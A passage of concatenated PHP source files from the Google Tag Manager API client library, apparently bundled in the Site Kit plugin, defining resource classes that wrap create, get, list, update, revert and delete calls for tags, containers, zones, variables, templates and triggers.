accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListTagsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesTags($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTagsResponse::class); } /** * Reverts changes to a GTM Tag in a GTM Workspace. (tags.revert) * * @param string $path GTM Tag's API relative path. Example: accounts/{account_i * d}/containers/{container_id}/workspaces/{workspace_id}/tags/{tag_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of thetag in storage. * @return RevertTagResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTagResponse::class); } /** * Updates a GTM Tag. (tags.update) * * @param string $path GTM Tag's API relative path. Example: accounts/{account_i * d}/containers/{container_id}/workspaces/{workspace_id}/tags/{tag_id} * @param Tag $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the tag in storage. * @return Tag * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTags::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesTags'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Container; use Google\Site_Kit_Dependencies\Google\Service\TagManager\GetContainerSnippetResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainersResponse; /** * The "containers" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $containers = $tagmanagerService->accounts_containers; * </code> */ class AccountsContainers extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Combines Containers. (containers.combine) * * @param string $path GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param bool allowUserPermissionFeatureUpdate Must be set to true to allow * features.user_permissions to change from false to true. If this operation * causes an update but this bit is false, the operation will fail. * @opt_param string containerId ID of container that will be merged into the * current container. * @opt_param string settingSource Specify the source of config setting after * combine * @return Container * @throws \Google\Service\Exception */ public function combine($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('combine', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } /** * Creates a Container. (containers.create) * * @param string $parent GTM Account's API relative path. Example: * accounts/{account_id}. * @param Container $postBody * @param array $optParams Optional parameters. * @return Container * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } /** * Deletes a Container. (containers.delete) * * @param string $path GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a Container. (containers.get) * * @param string $path GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * @return Container * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } /** * Lists all Containers that belongs to a GTM Account. * (containers.listAccountsContainers) * * @param string $parent GTM Account's API relative path. Example: * accounts/{account_id}. * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListContainersResponse * @throws \Google\Service\Exception */ public function listAccountsContainers($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainersResponse::class); } /** * Looks up a Container by destination ID. (containers.lookup) * * @param array $optParams Optional parameters. * * @opt_param string destinationId Destination ID linked to a GTM Container, * e.g. AW-123456789. Example: * accounts/containers:lookup?destination_id={destination_id}. * @return Container * @throws \Google\Service\Exception */ public function lookup($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('lookup', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } /** * Move Tag ID out of a Container. (containers.move_tag_id) * * @param string $path GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param bool allowUserPermissionFeatureUpdate Must be set to true to allow * features.user_permissions to change from false to true. If this operation * causes an update but this bit is false, the operation will fail. * @opt_param bool copySettings Whether or not to copy tag settings from this * tag to the new tag. * @opt_param bool copyTermsOfService Must be set to true to accept all terms of * service agreements copied from the current tag to the newly created tag. If * this bit is false, the operation will fail. * @opt_param bool copyUsers Whether or not to copy users from this tag to the * new tag. * @opt_param string tagId Tag ID to be removed from the current Container. * @opt_param string tagName The name for the newly created tag. * @return Container * @throws \Google\Service\Exception */ public function move_tag_id($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('move_tag_id', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } /** * Gets the tagging snippet for a Container. (containers.snippet) * * @param string $path Container snippet's API relative path. Example: * accounts/{account_id}/containers/{container_id}:snippet * @param array $optParams Optional parameters. * @return GetContainerSnippetResponse * @throws \Google\Service\Exception */ public function snippet($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('snippet', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\GetContainerSnippetResponse::class); } /** * Updates a Container. (containers.update) * * @param string $path GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param Container $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the container in storage. * @return Container * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainers::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainers'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersionHeader; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainerVersionsResponse; /** * The "version_headers" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $version_headers = $tagmanagerService->accounts_containers_version_headers; * </code> */ class AccountsContainersVersionHeaders extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets the latest container version header (version_headers.latest) * * @param string $parent GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * @return ContainerVersionHeader * @throws \Google\Service\Exception */ public function latest($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('latest', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersionHeader::class); } /** * Lists all Container Versions of a GTM Container. * (version_headers.listAccountsContainersVersionHeaders) * * @param string $parent GTM Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param bool includeDeleted Also retrieve deleted (archived) versions when * true. * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListContainerVersionsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersVersionHeaders($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainerVersionsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersVersionHeaders::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersVersionHeaders'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Destination; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListDestinationsResponse; /** * The "destinations" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $destinations = $tagmanagerService->accounts_containers_destinations; * </code> */ class AccountsContainersDestinations extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets a Destination. (destinations.get) * * @param string $path Google Tag Destination's API relative path. Example: acco * unts/{account_id}/containers/{container_id}/destinations/{destination_link_id * } * @param array $optParams Optional parameters. * @return Destination * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Destination::class); } /** * Adds a Destination to this Container and removes it from the Container to * which it is currently linked. (destinations.link) * * @param string $parent GTM parent Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param bool allowUserPermissionFeatureUpdate Must be set to true to allow * features.user_permissions to change from false to true. If this operation * causes an update but this bit is false, the operation will fail. * @opt_param string destinationId Destination ID to be linked to the current * container. * @return Destination * @throws \Google\Service\Exception */ public function link($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('link', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Destination::class); } /** * Lists all Destinations linked to a GTM Container. * (destinations.listAccountsContainersDestinations) * * @param string $parent GTM parent Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * @return ListDestinationsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersDestinations($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListDestinationsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersDestinations::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersDestinations'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListZonesResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertZoneResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone; /** * The "zones" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $zones = $tagmanagerService->accounts_containers_workspaces_zones; * </code> */ class AccountsContainersWorkspacesZones extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Zone. (zones.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Zone $postBody * @param array $optParams Optional parameters. * @return Zone * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class); } /** * Deletes a GTM Zone. (zones.delete) * * @param string $path GTM Zone's API relative path. Example: accounts/{account_ * id}/containers/{container_id}/workspaces/{workspace_id}/zones/{zone_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Zone. (zones.get) * * @param string $path GTM Zone's API relative path. Example: accounts/{account_ * id}/containers/{container_id}/workspaces/{workspace_id}/zones/{zone_id} * @param array $optParams Optional parameters. * @return Zone * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class); } /** * Lists all GTM Zones of a GTM container workspace. * (zones.listAccountsContainersWorkspacesZones) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListZonesResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesZones($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListZonesResponse::class); } /** * Reverts changes to a GTM Zone in a GTM Workspace. (zones.revert) * * @param string $path GTM Zone's API relative path. Example: accounts/{account_ * id}/containers/{container_id}/workspaces/{workspace_id}/zones/{zone_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the zone in storage. * @return RevertZoneResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertZoneResponse::class); } /** * Updates a GTM Zone. (zones.update) * * @param string $path GTM Zone's API relative path. Example: accounts/{account_ * id}/containers/{container_id}/workspaces/{workspace_id}/zones/{zone_id} * @param Zone $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the zone in storage. * @return Zone * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesZones::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesZones'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListVariablesResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertVariableResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable; /** * The "variables" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $variables = $tagmanagerService->accounts_containers_workspaces_variables; * </code> */ class AccountsContainersWorkspacesVariables extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Variable. (variables.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Variable $postBody * @param array $optParams Optional parameters. * @return Variable * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class); } /** * Deletes a GTM Variable. (variables.delete) * * @param string $path GTM Variable's API relative path. Example: accounts/{acco * unt_id}/containers/{container_id}/workspaces/{workspace_id}/variables/{variab * le_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Variable. (variables.get) * * @param string $path GTM Variable's API relative path. Example: accounts/{acco * unt_id}/containers/{container_id}/workspaces/{workspace_id}/variables/{variab * le_id} * @param array $optParams Optional parameters. * @return Variable * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class); } /** * Lists all GTM Variables of a Container. * (variables.listAccountsContainersWorkspacesVariables) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListVariablesResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesVariables($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListVariablesResponse::class); } /** * Reverts changes to a GTM Variable in a GTM Workspace. (variables.revert) * * @param string $path GTM Variable's API relative path. Example: accounts/{acco * unt_id}/containers/{container_id}/workspaces/{workspace_id}/variables/{variab * le_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the variable in storage. * @return RevertVariableResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertVariableResponse::class); } /** * Updates a GTM Variable. (variables.update) * * @param string $path GTM Variable's API relative path. Example: accounts/{acco * unt_id}/containers/{container_id}/workspaces/{workspace_id}/variables/{variab * le_id} * @param Variable $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the variable in storage. * @return Variable * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesVariables::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesVariables'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTemplatesResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTemplateResponse; /** * The "templates" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $templates = $tagmanagerService->accounts_containers_workspaces_templates; * </code> */ class AccountsContainersWorkspacesTemplates extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Custom Template. (templates.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param CustomTemplate $postBody * @param array $optParams Optional parameters. * @return CustomTemplate * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class); } /** * Deletes a GTM Template. (templates.delete) * * @param string $path GTM Custom Template's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/templates/ * {template_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Template. (templates.get) * * @param string $path GTM Custom Template's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/templates/ * {template_id} * @param array $optParams Optional parameters. * @return CustomTemplate * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class); } /** * Lists all GTM Templates of a GTM container workspace. * (templates.listAccountsContainersWorkspacesTemplates) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListTemplatesResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesTemplates($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTemplatesResponse::class); } /** * Reverts changes to a GTM Template in a GTM Workspace. (templates.revert) * * @param string $path GTM Custom Template's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/templates/ * {template_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the template in storage. * @return RevertTemplateResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTemplateResponse::class); } /** * Updates a GTM Template. (templates.update) * * @param string $path GTM Custom Template's API relative path. Example: account * s/{account_id}/containers/{container_id}/workspaces/{workspace_id}/templates/ * {template_id} * @param CustomTemplate $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the templates in storage. * @return CustomTemplate * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTemplates::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesTemplates'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTriggersResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTriggerResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger; /** * The "triggers" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $triggers = $tagmanagerService->accounts_containers_workspaces_triggers; * </code> */ class AccountsContainersWorkspacesTriggers extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Trigger. (triggers.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Trigger $postBody * @param array $optParams Optional parameters. * @return Trigger * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class); } /** * Deletes a GTM Trigger. (triggers.delete) * * @param string $path GTM Trigger's API relative path. Example: accounts/{accou * nt_id}/containers/{container_id}/workspaces/{workspace_id}/triggers/{trigger_ * id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Trigger. (triggers.get) * * @param string $path GTM Trigger's API relative path. Example: accounts/{accou * nt_id}/containers/{container_id}/workspaces/{workspace_id}/triggers/{trigger_ * id} * @param array $optParams Optional parameters. * @return Trigger * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class); } /** * Lists all GTM Triggers of a Container. * (triggers.listAccountsContainersWorkspacesTriggers) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListTriggersResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesTriggers($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTriggersResponse::class); } /** * Reverts changes to a GTM Trigger in a GTM Workspace. (triggers.revert) * * @param string $path GTM Trigger's API relative path. Example: accounts/{accou * nt_id}/containers/{container_id}/workspaces/{workspace_id}/triggers/{trigger_ * id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the trigger in storage. * @return RevertTriggerResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTriggerResponse::class); } /** * Updates a GTM Trigger. (triggers.update) * * @param string $path GTM Trigger's API relative path. Example: accounts/{accou * nt_id}/containers/{container_id}/workspaces/{workspace_id}/triggers/{trigger_ * id} * @param Trigger $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the trigger in storage. * @return Trigger * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTriggers::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesTriggers'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, 